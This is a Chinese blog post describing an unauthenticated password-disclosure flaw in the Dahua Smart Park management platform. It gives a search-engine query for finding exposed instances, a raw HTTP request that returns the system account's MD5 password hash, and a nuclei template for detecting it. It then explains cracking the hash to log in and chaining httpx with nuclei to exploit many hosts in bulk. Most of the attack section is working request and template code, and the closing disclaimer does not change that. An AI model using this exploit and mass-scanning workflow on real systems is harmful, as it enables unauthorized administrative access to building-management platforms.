httpx+nuclei实战 | 大华智慧园区综合管理平台任意密码读取漏洞

最新推荐文章于 2024-04-08 09:32:59 发布
最新推荐文章于 2024-04-08 09:32:59 发布
阅读量413 收藏 5
点赞数 4
文章标签: httpx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/137135092
版权
漏洞成因

没有对接口进行严格的权限管理,导致可以通过访问user_getUserInfoByUserName.action获取system用户的MD5加密后的密码

hunter语法

web.icon="4644f2d45601037b8423d45e13194c93"&&web.title="智慧园区综合管理平台"

POC
GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1Host: xxxxxxxxxCookie: JSESSIONID=D99F6DAEA7EC0695266E95A1B1A529CCCache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9X-Forwarded-For: 127.0.0.1Connection: close

编写.yam文件

id: dahuainfo:  name: Template Name  author: wuwen  severity: info  description: description  reference:    - https://  tags: tagsrequests:  - raw:      - |+        GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1        Host: {{Hostname}}        Cookie: JSESSIONID=D99F6DAEA7EC0695266E95A1B1A529CC        Cache-Control: max-age=0        Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"        Sec-Ch-Ua-Mobile: ?0        Sec-Ch-Ua-Platform: "Windows"        Upgrade-Insecure-Requests: 1        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        Sec-Fetch-Site: none        Sec-Fetch-Mode: navigate        Sec-Fetch-User: ?1        Sec-Fetch-Dest: document        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        X-Forwarded-For: 127.0.0.1        Connection: close    matchers-condition: and    matchers:      - type: word        part: body        words:          - loginPass      - type: status        status:          - 200

拼接POC访问之后就是这样

图片

再将里面的loginpass字段的内容进行MD5解密

图片


试了一下,很多就算用了付费的MD5解密也解不开[跟密码复杂程度有关],当然也有解得开的,然后输入账号/密码,就可以登录了

图片

速刷技巧

前两天听了月佬的课,知道了httpx和nuclei联动的强大,所以一起写在这里

httpx和nuclei的下载链接
 

  1.  
    https://github.com/projectdiscovery/httpx/releases
     
  2.  
    https://github.com/projectdiscovery/nuclei/releases
     
  3.  
    burp插件,写nuclei的.yaml文件的
     
  4.  
    https://github.com/projectdiscovery/nuclei-burp-plugin/releases
     
 

使用方法
 

首先使用httpx探测存活的目标,我使用的是windows
 

 

  1.  
    httpx.exe -l url.txt -mc 200 >> survival.txt
     
  2.  
    就是探测url.txt中的存活的地址(响应码为200) 存到当前目录的survival.txt中
     
 

然后使用burp抓取数据包(攻击成功的),选择部分返回包里的内容,使用插件nuclei
 

 

图片
 


 保存文件,应该是.yaml后缀的
 

 

图片
 

最后就是使用nuclei了
 

 

  1.  
    nuclei.exe -l survival.txt -t poc.yaml
     
 

如果成功的话就是这样(注意文件路径,如果不确定,就把文件拉进去用绝对路径)
 

图片
 

最后一定要去验证一下漏洞是否真的存在,然后再提交,通过这种联动,就可以批量打漏洞了。
 

   申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
 

免费领取安全学习资料包!
 


 渗透工具
 

技术文档、书籍
 

 

面试题
 

 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 

应急响应笔记
 

 

学习路线
 

 


                

        

        

    

  


    

      

        

            

              
                
                  运维Z叔
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞

				
			

			

				

					失心少年
				

				

					08-29
					
					995
					
				

			

		

		

			
				
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

			
		

	



                

              
                



	

		

			

				
					
【1day】复现大华智慧园区综合管理平台存在任意密码读取漏洞

				
			

			

				

					 记录并分享学习安全的知识点..
				

				

					08-16
					
					532
					
				

			

		

		

			
				
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在任意密码读取漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。

			
		

	



                


  
              

                


	

		

			

				
					
漏洞复现】大华智慧园区综合管理平台任意密码读取

				
			

			

				

					2201_75756681的博客
				

				

					01-05
					
					665
					
				

			

		

		

			
				
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

			
		

	





	

		

			

				
					
大华智慧园区综合管理平台任意密码读取漏洞复现

				
			

			

				

					
				

				

					08-14
					
					2372
					
				

			

		

		

			
				
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

			
		

	



		

			
		



	

		

			

				
					
大华智慧园区综合管理平台密码泄露漏洞

				
			

			

				

					xiaokp7的博客
				

				

					09-07
					
					1172
					
				

			

		

		

			
				
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。由于敏感目录并未进行鉴权,所以可以直接得到system的密码(采用MD5加密)。

			
		

	





	

		

			

				
					
httpx+async实现python 发起异步http请求

				
			

			

				

					07-10
				

			

		

		

			
				
在模拟测试并发的场景下,例如性能测试或负载测试,`httpx+async`的组合非常有用。你可以创建大量的异步任务来模拟多用户同时访问服务器,评估系统的处理能力、响应时间和吞吐量。通过调整并发任务的数量,可以更...

			
		

	





	

		

			

				
					
Python爬虫最强组合httpx+parsel测评

				
			

			

				

					mid56579的博客
				

				

					07-29
					
					878
					
				

			

		

		

			
				
Python网络爬虫领域两个最新的比较火的工具莫过于httpx和parsel了。

httpx号称下一代的新一代的网络请求库,不仅支持requests库的所有操作,还能发送异步请求,为编写异步爬虫提供了便利。

parsel最初集成在著名Python爬虫框架Scrapy中,后独立出来成立一个单独的模块,支持XPath选择器, CSS选择器和正则表达式等多种解析提取方式, 据说相比于BeautifulSoup,parsel的解析效率更高。

今天我们就以爬取链家网上的二手房在售房产信息为例,来测评下httpx

			
		

	





	

		

			

				
					
subdomain_shell:一键调用subfinder+ksubdomain+httpx 强强联合 从域名发现-->域名验证-->获取域名标题、状态码以及响应大小 最后保存结果,简化重复操作命令

				
			

			

				

					05-05
				

			

		

		

			
				
一键调用subfinder+ksubdomain+httpx 强强联合 从域名发现-->域名验证-->获取域名标题、状态码以及响应大小 最后保存结果,简化重复操作命令 updated on 2021-03-18 22:45 因为懒 \-_-\ 不想重复写命令,故诞生...

			
		

	





	

		

			

				
					
PyPI 官网下载 | httpx-0.7.6.tar.gz

				
			

			

				

					01-12
				

			

		

		

			
				
5. **超时控制**:httpx允许精细控制请求超时,包括连接超时和读取超时。 6. **HTTP/1.1 和 HTTP/2 支持**:httpx自动处理HTTP协议版本,可以与服务器协商最合适的协议版本。 7. **自动重试**:对于网络不稳定的情况...

			
		

	





	

		

			

				
					
大华智慧园区管理平台任意密码读取漏洞 复现

				
			

			

				

					薛定谔嘚喵博客
				

				

					10-08
					
					332
					
				

			

		

		

			
				
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务、摄像监控等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台存在任意密码读取漏洞,可以直接读取管理账号名以及其密码Hash值,造成未授权登入访问劫持园区管理平台,危害性高。

			
		

	





	

		

			

				
					
探索网络扫描的新维度:Masscan2Httpx2Nuclei-Xray

				
			

			

				

					gitblog_00084的博客
				

				

					04-08
					
					268
					
				

			

		

		

			
				
探索网络扫描的新维度:Masscan2Httpx2Nuclei-Xray
项目地址:https://gitcode.com/mbskter/Masscan2Httpx2Nuclei-Xray
该项目(https://gitcode.com/mbskter/Masscan2Httpx2Nuclei-Xray)是一个集成工具链,将Masscan、Httpx和Nuclei-Xray结合在一起,旨在为安全...

			
		

	





	

		

			

				
					
大华智慧园区综合管理平台 clientServer SQL注入漏洞复现

				
			

			

				

					0xSec
				

				

					03-13
					
					598
					
				

			

		

		

			
				
​由于大华智慧园区综合管理平台clientServer接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。

			
		

	





	

		

			

				
					
大华DSS数字监控系统 attachment_clearTempFile sql注入漏洞复现(含nuclei-POC)

				
			

			

				

					m0_50797689的博客
				

				

					03-19
					
					852
					
				

			

		

		

			
				
大华DSS数字监控系统 attachment_clearTempFile sql注入漏洞复现(含nuclei-POC)

			
		

	





	

		

			

				
					
Nuclei联动工具

				
			

			

				

					weixin_43993545的博客
				

				

					05-17
					
					392
					
				

			

		

		

			
				
我们进行测试漏洞的时候,可以利用FoFax联动Nuclei方式来很方便的实现此目的。提高效率,提高生产力

			
		

	





	

		

			

				
					
FofaMap_V1.1.3 国庆特别版【联动 Nuclei

				
			

			

				

					asaotomo的博客
				

				

					10-13
					
					2118
					
				

			

		

		

			
				
FofaMap_V1.1.3 国庆特别版【联动 Nuclei

			
		

	





	

		

			

				
					
Web安全和渗透测试有什么关系?

				
			

			

				

					Python_0011的博客
				

				

					03-31
					
					1065
					
				

			

		

		

			
				
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。

			
		

	





	

		

			

				
					
打造全自动漏洞赏金扫描工具

				
			

			

				

					渗透测试研究中心
				

				

					08-25
					
					2780
					
				

			

		

		

			
				
打造全自动漏洞赏金扫描工具

			
		

	





	

		

			

				
					
打造全自动漏洞赏金扫描工具_nuclei扫描器联动xray

				
			

			

				

					yy1715713348的博客
				

				

					01-25
					
					1394
					
				

			

		

		

			
				
建议在 Digital Ocean 或 vultr 等 VPS 系统上运行这些程序,启一个后台线程即可,建议使用tmux的后台功能这样扫描到重复漏洞会非常少的,也会更加容易获取赏金,将更多的关注新资产漏洞资产侦察 资产收集、端口扫描,去重检测,存活探测,漏洞扫描,全自动化,结果通知,全部自动化了,即使睡觉也在挖洞随着信息技术的快速发展和互联网的普及,IT行业 成为一个非常热门的领域,也是目前就业前景非常广阔的领域之一。

			
		

	





	

		

			

				
					
带用户名密码http代理 如何在httpx.client中及时刷新  防止403错误

					
最新发布

				
			

			

				

					09-17
				

			

		

		

			
				
在`httpx.client`中,如果你使用的是需要用户名和密码HTTP代理,当遇到403 Forbidden错误并怀疑是由于代理账户过期或权限问题导致的,你可以采取以下策略来及时刷新:

1. **使用HttpProxyAuth认证**:
   ```python
   from httpx import Auth, HTTPProxyAuth

   username = "your_username"
   password = "your_password"
   
   auth = HTTPProxyAuth(username, password)
   client = httpx.Client(proxies={"https": "http://username:password@proxy_address:port"})
   ```
   这样每次请求都会带上正确的认证信息。如果账号有问题,可以考虑设置一个自动重试机制,在收到403响应后尝试重新登录。

2. **封装认证逻辑**:
   创建一个函数用于处理登录和刷新凭证:
   ```python
   def authenticate():
       # 实现登录、保存新凭证的过程
       pass
   
   def handle_403(response):
       if response.status_code == 403 and needs_refresh(response):
           authenticate()
           return client.get(url, auth=auth)  # 尝试重新获取资源

   client = httpx.Client(proxies={"https": "http://proxy_address:port"}, event_hooks={"response": handle_403})
   ```

3. **设置超时和重试**:
   对于频繁的403错误,可以设置一些超时和重试策略,如使用`httpx.Timeout`和`httpx.Retry`类:
   ```python
   retry = httpx.Retry(total=3, backoff_factor=0.5, status_forcelist=[403])
   timeout = httpx.Timeout(60)

   with client as session:
       try:
           response = session.get(url, auth=auth, timeout=timeout, retry=retry)
       except Exception as e:
           if isinstance(e, httpx.exceptions.ConnectTimeout):
               authenticate()
               # 重新尝试...
   ```

记得定期检查代理服务的更新政策,确保不会因为频繁登录而触发封锁。同时,如果问题是由于服务器端的问题而非代理,直接联系服务器提供者也是一个好办法。



			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值